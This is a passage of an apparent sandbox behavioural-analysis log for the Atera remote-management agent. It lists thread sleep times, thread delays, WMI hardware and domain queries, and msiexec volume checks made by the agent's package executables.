                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -597638s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -597513s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -597399s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -597240s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -597087s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -596954s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -596797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -596688s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -596578s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -596469s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -596360s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -596235s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -596105s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -596000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -595890s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -595683s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -595568s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -595452s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -595331s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -595188s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -595000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -594823s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -594688s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -594563s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -594375s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -594260s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -594148s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -594035s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -593921s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -593793s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -593683s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -593578s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -593468s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -593346s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -593232s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -593125s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7224Thread sleep time: -593015s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe TID: 4464Thread sleep count: 7333 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe TID: 5236Thread sleep time: -27670116110564310s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe TID: 4464Thread sleep count: 2366 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 4348Thread sleep count: 192 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 1852Thread sleep count: 102 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 7220Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 8116Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 3492Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 6208Thread sleep count: 35 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 6208Thread sleep time: -32281802128991695s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 6240Thread sleep count: 6128 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 6240Thread sleep count: 3672 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Manufacturer,SoftwareElementID,ReleaseDate from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Manufacturer,SoftwareElementID,ReleaseDate from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain,Workgroup,Domain FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain,Workgroup,Domain FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599765
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599655
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599437
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599327
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599218
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599099
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598755
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598531
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598411
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598296
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598187
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598077
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597968
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597859
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597750
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597531
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597421
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597312
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597203
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597093
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596765
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596654
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596422
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596312
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596203
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596093
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595765
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595656
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599625
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599202
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599075
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598954
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598829
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598711
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598601
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598478
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598297
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598024
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597907
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597793
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597681
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597569
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597438
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597320
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597204
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597079
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596954
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596838
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596719
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596594
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596484
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596373
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596032
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595907
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595688
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595438
